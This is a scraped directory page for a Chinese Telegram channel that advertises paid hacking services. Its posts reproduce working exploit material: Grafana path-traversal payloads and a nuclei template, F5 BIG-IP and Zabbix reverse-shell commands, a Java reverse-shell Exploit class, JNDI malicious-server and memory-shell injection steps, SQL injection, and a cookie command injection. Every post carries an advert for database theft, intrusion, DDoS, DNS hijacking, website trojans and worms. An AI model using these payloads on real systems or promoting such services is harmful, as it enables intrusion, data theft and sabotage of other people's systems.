黑客改单爬虫 DNS劫持

Public

无法加入？ @changwaiguang1

10.4k 成员

已更新: May 14, 2026 at 1:33 PM

黑客改单爬虫 DNS劫持

黑客改单渗透劫持破解

@changwaiguang1 is a growing community focused on 安全工具 (Hacking Tools) and related topics

排名

全球排名

#456

语言排名

#45

类别排名

#23

-1

订阅者增长 (过去 7 天)

总计: 10.4K

24 小时增长: +0 0%

最新帖子

黑客改单爬虫 DNS劫持

2026年5月24日 11:41

📷 Photo

和工具放到同一目录，使用工具生成最终要让目标加载的类文件（用于将目标类的旧字节码替换为新字节码）

java -jar .\FilelessAgentMemshellGenerator.jar -b 64 -c "org.apache.tomcat.websocket.server. WsFilter" -i false -o "Windows" -p .\WsFilter.class -t false
弹出警告，但还是成功生成了所需的类文件

接单中，拖库，渗透，破解，提权，改单，爆破，DDOS攻击，Dns劫持，网站挂马，蠕虫病毒
技术咨询： https://t.me/changwaiguang

黑客改单爬虫 DNS劫持

2026年5月24日 11:41

📷 Photo

在此目录找到生成的新class文件

接单中，拖库，渗透，破解，提权，改单，爆破，DDOS攻击，Dns劫持，网站挂马，蠕虫病毒
技术咨询： https://t.me/changwaiguang

黑客改单爬虫 DNS劫持

2026年5月24日 11:41

JNDI恶意服务器可以用ysomap等工具快速部署，这里简单讲讲手工步骤

首先需要启动一个RMI服务或者LDAP服务，随便绑定一个远程对象上去

接着使用python -m http.server在此目录开启一个Http服务

将引用的地址设置为Http服务的URL，如http://localhost:8000/，设置类名和工厂名

Reference refObj = new Reference("AgentMemShell","AgentMemShell","http://localhost:8000/");

再将引用重绑定给JNDI服务

InitialContext initialContext = new InitialContext();

initialContext.rebind("rmi://localhost:11451/remoteObj",refObj);

最后启动JNDI服务

import javax.naming. InitialContext;
import javax.naming. Reference;

public class JNDIServer {
public static void main(String[] args) throws Exception{
InitialContext initialContext = new InitialContext();
Reference refObj = new Reference("AgentMemShell","AgentMemShell","http://localhost:8000/");
initialContext.rebind("rmi://localhost:11451/remoteObj",refObj);
}
}

黑客改单爬虫 DNS劫持

2026年5月24日 11:41

payloads:
auth:
- "/public/plugins/alertlist/../../../../../../../../../../../etc/passwd"
- "/public/plugins/annolist/../../../../../../../../../../../etc/passwd"
- "/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../../../../etc/passwd"
- "/public/plugins/barchart/../../../../../../../../../../../etc/passwd"
- "/public/plugins/bargauge/../../../../../../../../../../../etc/passwd"
- "/public/plugins/cloudwatch/../../../../../../../../../../../etc/passwd"
- "/public/plugins/dashlist/../../../../../../../../../../../etc/passwd"
- "/public/plugins/elasticsearch/../../../../../../../../../../../etc/passwd"
- "/public/plugins/gauge/../../../../../../../../../../../etc/passwd"
- "/public/plugins/geomap/../../../../../../../../../../../etc/passwd"
- "/public/plugins/gettingstarted/../../../../../../../../../../../etc/passwd"
- "/public/plugins/stackdriver/../../../../../../../../../../../etc/passwd"
- "/public/plugins/graph/../../../../../../../../../../../etc/passwd"
- "/public/plugins/graphite/../../../../../../../../../../../etc/passwd"
- "/public/plugins/heatmap/../../../../../../../../../../../etc/passwd"
- "/public/plugins/histogram/../../../../../../../../../../../etc/passwd"
- "/public/plugins/influxdb/../../../../../../../../../../../etc/passwd"
- "/public/plugins/jaeger/../../../../../../../../../../../etc/passwd"
- "/public/plugins/logs/../../../../../../../../../../../etc/passwd"
- "/public/plugins/loki/../../../../../../../../../../../etc/passwd"
- "/public/plugins/mssql/../../../../../../../../../../../etc/passwd"
- "/public/plugins/mysql/../../../../../../../../../../../etc/passwd"
- "/public/plugins/news/../../../../../../../../../../../etc/passwd"
- "/public/plugins/nodeGraph/../../../../../../../../../../../etc/passwd"
- "/public/plugins/opentsdb/../../../../../../../../../../../etc/passwd"
- "/public/plugins/piechart/../../../../../../../../../../../etc/passwd"
- "/public/plugins/pluginlist/../../../../../../../../../../../etc/passwd"
- "/public/plugins/postgres/../../../../../../../../../../../etc/passwd"
- "/public/plugins/prometheus/../../../../../../../../../../../etc/passwd"
- "/public/plugins/stat/../../../../../../../../../../../etc/passwd"
- "/public/plugins/state-timeline/../../../../../../../../../../../etc/passwd"
- "/public/plugins/status-history/../../../../../../../../../../../etc/passwd"
- "/public/plugins/table/../../../../../../../../../../../etc/passwd"
- "/public/plugins/table-old/../../../../../../../../../../../etc/passwd"
- "/public/plugins/tempo/../../../../../../../../../../../etc/passwd"
- "/public/plugins/testdata/../../../../../../../../../../../etc/passwd"
- "/public/plugins/text/../../../../../../../../../../../etc/passwd"
- "/public/plugins/timeseries/../../../../../../../../../../../etc/passwd"
- "/public/plugins/welcome/../../../../../../../../../../../etc/passwd"
- "/public/plugins/zipkin/../../../../../../../../../../../etc/passwd"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "root:"
- "grafana:"
condition: an



接单中，拖库，渗透，破解，提权，改单，爆破，DDOS攻击，Dns劫持，网站挂马，蠕虫病毒
技术咨询： https://t.me/changwaiguang

黑客改单爬虫 DNS劫持

2026年5月24日 11:41

上个月看了rebeyond、游望之、Xiaopan233师傅介绍无文件落地注入Agent内存马技术的文章，就想着实操复现一下，没想到遇到了很多问题，花了不少时间才解决，于是准备写篇实操记录，帮各位避坑

此项技术适用于具有动态代码上下文执行能力情景下的通用内存马注入（仅仅Runtime.getRuntime().exec()是不行的，必须要有执行多条代码的能力）

**提示：**阅读本文需要你对JNDI注入、反序列化漏洞有基本认识，当然了解Agent内存马更是必须的；如果对这项技术尚未理解，推荐去那几位师傅的博客看看

接下来我将使用自己写的小工具进行模拟攻击注入，在这个过程中谈几个实战中的问题，如果读者没有实践过，不妨跟着本文动手操作下

项目地址： https://github.com/whocansee/FilelessAgentMemShell （包括测试所需的简易漏洞环境以及新类字节码）

接单中，拖库，渗透，破解，提权，改单，爆破，DDOS攻击，Dns劫持，网站挂马，蠕虫病毒
技术咨询： https://t.me/changwaiguang

黑客改单爬虫 DNS劫持

2026年5月24日 11:41

测试环境：Windows 10、JDK8u66、SpringBoot 2（暴露任意反序列化和JNDI接口）

以使用JNDI注入漏洞向JDK低版本、Windows目标打入Agent内存马为例

生成用于注入Agent内存马的类文件
首先选用常见的org.apache.tomcat.websocket.server. WsFilter作为宿主类

javassist修改其字节码并输出新的class文件（在其方法体前面添加了计算器）

ClassPool pool = ClassPool.getDefault();
CtClass ctClass = pool.getCtClass("org.apache.tomcat.websocket.server. WsFilter");
CtMethod m = ctClass.getDeclaredMethod("doFilter");
m.insertBefore("Runtime.getRuntime().exec(\"calc\");");
ctClass.writeFile();
ctClass.detach();


接单中，拖库，渗透，破解，提权，改单，爆破，DDOS攻击，Dns劫持，网站挂马，蠕虫病毒
技术咨询： https://t.me/changwaiguang

黑客改单爬虫 DNS劫持

2026年5月24日 11:41

📷 Photo

漏洞影响:

Grafana 8.0.0 – 8.3.0

FOFA:app=”Grafana”

1.抓包并修改payload，即可任意读取/etc/passwd

数据包：
GET /public/plugins/annolist/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0


接单中，拖库，渗透，破解，提权，改单，爆破，DDOS攻击，Dns劫持，网站挂马，蠕虫病毒
技术咨询： https://t.me/changwaiguang

黑客改单爬虫 DNS劫持

2026年5月24日 11:41

nuclei漏洞脚本如下（nuclei稳定快，编写poc简单，有社区维护，推荐使用）

nuclei下载地址： https://github.com/projectdiscovery/nuclei

批量验证命令：
nuclei.exe -list subs.txt -t cves/2021/CVE-2021-43798.yaml
yaml POC：
id: CVE-2021-43798
info:
name: Grafana v8.x Arbitrary File Read
author: z0ne,dhiyaneshDk
severity: high
description: Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is /public/plugins/NAME/, where NAME is the plugin ID for any installed plugin.
reference:
- https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
- https://nosec.org/home/detail/4914.html
- https://github.com/jas502n/Grafana-VulnTips
- https://nvd.nist.gov/vuln/detail/CVE-2021-43798
remediation: Upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-43798
cwe-id: CWE-22
tags: cve,cve2021,grafana,lfi
requests:
- raw:
- |
GET {{(auth)}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0


接单中，拖库，渗透，破解，提权，改单，爆破，DDOS攻击，Dns劫持，网站挂马，蠕虫病毒
技术咨询： https://t.me/changwaiguang

黑客改单爬虫 DNS劫持

2026年5月24日 11:41

📷 Photo

nc监听7778端口

nc -lnvp 7778
Administration→Scripts→Create Script写一个反弹shell的脚本

bash -i >& /dev/tcp/IP/PORT 0>&1
Monitoring→Latest data→点击Zabbix server运行脚本，得到一个shell（注：需要在筛选栏host groups选择Zabbix servers才能看到1脚本）

接单中，拖库，渗透，破解，提权，改单，爆破，DDOS攻击，Dns劫持，网站挂马，蠕虫病毒
技术咨询： https://t.me/changwaiguang

黑客改单爬虫 DNS劫持

2026年5月24日 11:41

📷 Photo

Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后，Grafana可以在网络浏览器里显示数据图表和警告。未授权的攻击者利用该漏洞，能够获取服务器敏感文件。

接单中，拖库，渗透，破解，提权，改单，爆破，DDOS攻击，Dns劫持，网站挂马，蠕虫病毒
技术咨询： https://t.me/changwaiguang

黑客改单爬虫 DNS劫持

2026年5月10日 02:28

📷 Photo

0x03 漏洞复现
漏洞影响: Spring Framework < 5.2.20、Spring Framework < 5.3.18

FOFA:Spring Framework

1.开启CVE-2022-22965 vulhub环境

https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22965
docker-compose up -d


接单中，拖库，渗透，破解，提权，改单，爆破，DDOS攻击，Dns劫持，网站挂马，蠕虫病毒
技术咨询： https://t.me/changwaiguang

黑客改单爬虫 DNS劫持

2026年5月10日 02:28

📷 Photo

F5官网发布安全公告，披露F5 BIG-IP存在一处远程代码执行漏洞（CVE-2022-1388）。漏洞存在于iControl REST组件中，未经身份验证的攻击者可以发送请求绕过BIG-IP中的iControl REST认证，进而导致可以在目标主机上执行任意系统命令、创建或删除文件或禁用BIG-IP上的服务。


接单中，拖库，渗透，破解，提权，改单，爆破，DDOS攻击，Dns劫持，网站挂马，蠕虫病毒
技术咨询： https://t.me/changwaiguang

黑客改单爬虫 DNS劫持

2026年5月10日 02:28

📷 Photo

执行poc写入无害文件，访问该文件得到内容
POST /cgi-bin/login.cgi HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
Connection: close
Content-Length: 112
Content-Type: Application/X-www-Form
Cookie: PHPSESSID=$(echo 156828301~ > /fwlib/sys/virus/webui/svpn_html/qwer.txt);
Accept-Encoding: gzip
{"opr":"login", "data":{"user": "watchTowr" , "pwd": "watchTowr" , "vericode": "EINW" , "privacy_enable": "0"}}
访问/svpn_html/qwer.txt路径


接单中，拖库，渗透，破解，提权，改单，爆破，DDOS攻击，Dns劫持，网站挂马，蠕虫病毒
技术咨询： https://t.me/changwaiguang

黑客改单爬虫 DNS劫持

2026年5月10日 02:28

📷 Photo

0x03 漏洞复现
漏洞影响:

BIG-IP 16.x: 16.1.0 – 16.1.2
BIG-IP 15.x: 15.1.0 – 15.1.5
BIG-IP 14.x: 14.1.0 – 14.1.4
BIG-IP 13.x: 13.1.0 – 13.1.4
BIG-IP 12.x: 12.1.0 – 12.1.6
BIG-IP 11.x: 11.6.1 – 11.6.5
shodan:http.title:”BIG-IP®-+Redirect” +”Server”
1.执行反弹shell命令

POST /mgmt/tm/util/bash HTTP/1.1
Host: x.x.x.x
Content-Length: 85
Connection: Keep-Alive, X-F5-Auth-Token
Cache-Control: max-age=0a
X-F5-Auth-Token: a
Authorization: Basic YWRtaW46xxxxx=
{"command":"run",
"utilCmdArgs":"-c 'bash -i >& /dev/tcp/x.x.x.x/7777 0>&1'"}

接单中，拖库，渗透，破解，提权，改单，爆破，DDOS攻击，Dns劫持，网站挂马，蠕虫病毒
技术咨询： https://t.me/changwaiguang

黑客改单爬虫 DNS劫持

2026年5月10日 02:28

📷 Photo

使用python在Exploit.class目录开启http服务

python3 -m http.server 8888
4. 使用marshalsec开启一个rmi服务为9999端口，去访问并执行python开启的http服务中Exploit.class脚本文件

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi. RMIRefServer "http://pythonhttp:88

接单中，拖库，渗透，破解，提权，改单，爆破，DDOS攻击，Dns劫持，网站挂马，蠕虫病毒
技术咨询： https://t.me/changwaiguang

黑客改单爬虫 DNS劫持

2026年5月10日 02:28

🎥 Video

批量验证命令：
nuclei -list 1.txt -t CVE-2022-1388.yaml
yaml POC：
id: CVE-2022-1388
info:
name: F5 BIG-IP iControl REST Auth Bypass RCE
author: dwisiswant0
severity: critical
description: |
This vulnerability may allow an unauthenticated attacker
with network access to the BIG-IP system through the management
port and/or self IP addresses to execute arbitrary system commands,
create or delete files, or disable services. There is no data plane
exposure; this is a control plane issue only.
reference:


接单中，拖库，渗透，破解，提权，改单，爆破，DDOS攻击，Dns劫持，网站挂马，蠕虫病毒
技术咨询： https://t.me/changwaiguang

黑客改单爬虫 DNS劫持

2026年5月10日 02:28

📷 Photo

0x03 漏洞复现
漏洞影响:

BIG-IP 16.x: 16.1.0 – 16.1.2
BIG-IP 15.x: 15.1.0 – 15.1.5
BIG-IP 14.x: 14.1.0 – 14.1.4
BIG-IP 13.x: 13.1.0 – 13.1.4
BIG-IP 12.x: 12.1.0 – 12.1.6
BIG-IP 11.x: 11.6.1 – 11.6.5
shodan:http.title:”BIG-IP®-+Redirect” +”Server”
1.执行反弹shell命令

POST /mgmt/tm/util/bash HTTP/1.1
Host: x.x.x.x
Content-Length: 85
Connection: Keep-Alive, X-F5-Auth-Token
Cache-Control: max-age=0a
X-F5-Auth-Token: a
Authorization: Basic YWRtaW46xxxxx=
{"command":"run",
"utilCmdArgs":"-c 'bash -i >& /dev/tcp/x.x.x.x/7777 0>&1'"}


接单中，拖库，渗透，破解，提权，改单，爆破，DDOS攻击，Dns劫持，网站挂马，蠕虫病毒
技术咨询： https://t.me/changwaiguang

黑客改单爬虫 DNS劫持

2026年5月10日 02:28

📷 Photo

因为不存在回显，我们这里还是使用updatexml报错注入

直接输入报错语句，因为检测到黑名单词语，被拦截
http://127.0.0.1/lmxcms1.4/index.php?m=Tags&name=1andupdatexml(1,concat(0x7e,database(),0x7e),1)#


接单中，拖库，渗透，破解，提权，改单，爆破，DDOS攻击，Dns劫持，网站挂马，蠕虫病毒
技术咨询： https://t.me/changwaiguang

黑客改单爬虫 DNS劫持

2026年5月10日 02:28

📷 Photo

尝试反弹shell，首先编译exp文件为class文件（根据自己NC监听的VPS和端口设置ip/port）

exp文件：
import java.io. BufferedReader;
import java.io. InputStream;
import java.io. InputStreamReader;

public class Exploit{
public Exploit() throws Exception {
Process p = Runtime.getRuntime().exec(new String[]{"bash", "-c", "bash -i >& /dev/tcp/ip/port 0>&1"});
InputStream is = p.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(is));

String line;
while((line = reader.readLine()) != null) {
System.out.println(line);
}

p.waitFor();
is.close();
reader.close();
p.destroy();
}

public static void main(String[] args) throws Exception {
}
}
编译：
javac http://Exploit.java/


接单中，拖库，渗透，破解，提权，改单，爆破，DDOS攻击，Dns劫持，网站挂马，蠕虫病毒
技术咨询： https://t.me/changwaiguang

黑客改单爬虫 DNS劫持

2026年5月10日 02:28

📷 Photo

0x02 漏洞描述
Fastjson是一个Java库,可以将Java对象转换为JSON格式,当然它也可以将JSON字符串转换为Java对象。

在1.2.24中，fastjson在解析json的过程中,支持使用@type字段来指定反序列化的类型,并调用该类的set/get方法来访问属性,当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,即可构造出一些恶意利用链。


接单中，拖库，渗透，破解，提权，改单，爆破，DDOS攻击，Dns劫持，网站挂马，蠕虫病毒
技术咨询： https://t.me/changwaiguang

黑客改单爬虫 DNS劫持

2026年5月2日 12:55

📷 Photo

当管理员进入了首页或者操作日志，即可执行计划任务写入webshell（注：360会阻止写入.php的文件）


接单中，拖库，渗透，破解，提权，改单，爆破，DDOS攻击，Dns劫持，网站挂马，蠕虫病毒
技术咨询： https://t.me/changwaiguang

黑客改单爬虫 DNS劫持

2026年5月2日 12:55

📷 Photo

构造payload执行刚刚上传的/tmp/shell脚本，得到一个shell


接单中，拖库，渗透，破解，提权，改单，爆破，DDOS攻击，Dns劫持，网站挂马，蠕虫病毒
技术咨询： https://t.me/changwaiguang

黑客改单爬虫 DNS劫持

2026年5月2日 12:55

📷 Photo

如果出现无法访问…没有那个文件或目录
解决办法：先在window主机上按win+r键然后输入services.msc
回车

接单中，拖库，渗透，破解，提权，改单，爆破，DDOS攻击，Dns劫持，网站挂马，蠕虫病毒
技术咨询： https://t.me/changwaiguang

黑客改单爬虫 DNS劫持

2026年5月2日 12:55

📷 Photo

用户名输入如下payload，密码任意登录两次（登录一次面板有时候会不显示）


接单中，拖库，渗透，破解，提权，改单，爆破，DDOS攻击，Dns劫持，网站挂马，蠕虫病毒
技术咨询： https://t.me/changwaiguang

黑客改单爬虫 DNS劫持

2026年5月2日 12:55

JNDI恶意服务器可以用ysomap等工具快速部署，这里简单讲讲手工步骤

首先需要启动一个RMI服务或者LDAP服务，随便绑定一个远程对象上去

接着使用python -m http.server在此目录开启一个Http服务

将引用的地址设置为Http服务的URL，如http://localhost:8000/，设置类名和工厂名

Reference refObj = new Reference("AgentMemShell","AgentMemShell","http://localhost:8000/");

再将引用重绑定给JNDI服务

InitialContext initialContext = new InitialContext();

initialContext.rebind("rmi://localhost:11451/remoteObj",refObj);

最后启动JNDI服务

import javax.naming. InitialContext;
import javax.naming. Reference;

public class JNDIServer {
public static void main(String[] args) throws Exception{
InitialContext initialContext = new InitialContext();
Reference refObj = new Reference("AgentMemShell","AgentMemShell","http://localhost:8000/");
initialContext.rebind("rmi://localhost:11451/remoteObj",refObj);
}
}

黑客改单爬虫 DNS劫持

2026年5月2日 12:55

利用JNDI注入漏洞实现内存马注入
启动漏洞环境，代码如下

https://t.me/GetMapping({"/jndi"})
public void jndi( https://t.me/RequestParam String b) throws Exception {
byte[] decodedBytes = Base64.getDecoder().decode(b);
String decodedUrl = new String(decodedBytes , StandardCharsets. UTF_8);
InitialContext ctx = new InitialContext();
ctx.lookup(decodedUrl);
}
访问URL完成攻击 （传过去的jndi-url是rmi://localhost:11451/remoteObj）

http://localhost:8080/memShell/jndi?b=cm1pOi8vbG9jYWxob3N0OjExNDUxL3JlbW90ZU9iag==


接单中，拖库，渗透，破解，提权，改单，爆破，DDOS攻击，Dns劫持，网站挂马，蠕虫病毒
技术咨询： https://t.me/changwaiguang

黑客改单爬虫 DNS劫持

2026年5月2日 12:55

📷 Photo

在此目录找到生成的新class文件

接单中，拖库，渗透，破解，提权，改单，爆破，DDOS攻击，Dns劫持，网站挂马，蠕虫病毒
技术咨询： https://t.me/changwaiguang

黑客改单爬虫 DNS劫持

2026年4月22日 19:51

📷 Photo

和工具放到同一目录，使用工具生成最终要让目标加载的类文件（用于将目标类的旧字节码替换为新字节码）

java -jar .\FilelessAgentMemshellGenerator.jar -b 64 -c "org.apache.tomcat.websocket.server. WsFilter" -i false -o "Windows" -p .\WsFilter.class -t false
弹出警告，但还是成功生成了所需的类文件

接单中，拖库，渗透，破解，提权，改单，爆破，DDOS攻击，Dns劫持，网站挂马，蠕虫病毒
技术咨询： https://t.me/changwaiguang

黑客改单爬虫 DNS劫持

2026年4月22日 19:51

上个月看了rebeyond、游望之、Xiaopan233师傅介绍无文件落地注入Agent内存马技术的文章，就想着实操复现一下，没想到遇到了很多问题，花了不少时间才解决，于是准备写篇实操记录，帮各位避坑

此项技术适用于具有动态代码上下文执行能力情景下的通用内存马注入（仅仅Runtime.getRuntime().exec()是不行的，必须要有执行多条代码的能力）

**提示：**阅读本文需要你对JNDI注入、反序列化漏洞有基本认识，当然了解Agent内存马更是必须的；如果对这项技术尚未理解，推荐去那几位师傅的博客看看

接下来我将使用自己写的小工具进行模拟攻击注入，在这个过程中谈几个实战中的问题，如果读者没有实践过，不妨跟着本文动手操作下

项目地址： https://github.com/whocansee/FilelessAgentMemShell （包括测试所需的简易漏洞环境以及新类字节码）

接单中，拖库，渗透，破解，提权，改单，爆破，DDOS攻击，Dns劫持，网站挂马，蠕虫病毒
技术咨询： https://t.me/changwaiguang

黑客改单爬虫 DNS劫持

2026年4月22日 19:51

测试环境：Windows 10、JDK8u66、SpringBoot 2（暴露任意反序列化和JNDI接口）

以使用JNDI注入漏洞向JDK低版本、Windows目标打入Agent内存马为例

生成用于注入Agent内存马的类文件
首先选用常见的org.apache.tomcat.websocket.server. WsFilter作为宿主类

javassist修改其字节码并输出新的class文件（在其方法体前面添加了计算器）

ClassPool pool = ClassPool.getDefault();
CtClass ctClass = pool.getCtClass("org.apache.tomcat.websocket.server. WsFilter");
CtMethod m = ctClass.getDeclaredMethod("doFilter");
m.insertBefore("Runtime.getRuntime().exec(\"calc\");");
ctClass.writeFile();
ctClass.detach();


接单中，拖库，渗透，破解，提权，改单，爆破，DDOS攻击，Dns劫持，网站挂马，蠕虫病毒
技术咨询： https://t.me/changwaiguang

Showing 30 of 50 posts

评分

需要登录

用户评论 (0)

暂无评论。成为第一个分享您体验的人！

黑客改单爬虫 DNS劫持

黑客改单爬虫 DNS劫持

排名

订阅者增长 (过去 7 天)

最新帖子

评分

用户评论 (0)

相关 Telegram 频道

🛒 Telegram 店铺

AdsGram 中文

Китайская Панорама

🥇🥇🥇【官方推荐】🚀极速VPN加速器官方频道🚀

秋刀鱼 Kernel Channel

💟自贡💟诚信平台/同城约炮💟优质资源/真实可靠💟

zh__CN 简体中文中文设置中文简体中文汉化

艺欣的小秘密

相关 Telegram 频道

🛒 Telegram 店铺

AdsGram 中文

Китайская Панорама

🥇🥇🥇【官方推荐】🚀极速VPN加速器官方频道🚀

秋刀鱼 Kernel Channel

💟自贡💟诚信平台/同城约炮💟优质资源/真实可靠💟

zh__CN 简体中文中文设置中文简体中文汉化

艺欣的小秘密

用户评论 (0)

最新帖子

黑客改单 爬虫 DNS劫持

黑客改单 爬虫 DNS劫持

排名

订阅者增长 (过去 7 天)

最新帖子

评分

用户评论 (0)

相关 Telegram 频道

🛒 Telegram 店铺

AdsGram 中文

Китайская Панорама

🥇🥇🥇【官方推荐】🚀极速VPN加速器官方频道🚀

秋刀鱼 Kernel Channel

💟自贡💟诚信平台/同城约炮💟优质资源/真实可靠💟

zh__CN 简体中文 中文设置 中文简体 中文汉化

艺欣的小秘密

相关 Telegram 频道

🛒 Telegram 店铺

AdsGram 中文

Китайская Панорама

🥇🥇🥇【官方推荐】🚀极速VPN加速器官方频道🚀

秋刀鱼 Kernel Channel

💟自贡💟诚信平台/同城约炮💟优质资源/真实可靠💟

zh__CN 简体中文 中文设置 中文简体 中文汉化

艺欣的小秘密

用户评论 (0)

最新帖子

黑客改单爬虫 DNS劫持

黑客改单爬虫 DNS劫持

zh__CN 简体中文中文设置中文简体中文汉化

zh__CN 简体中文中文设置中文简体中文汉化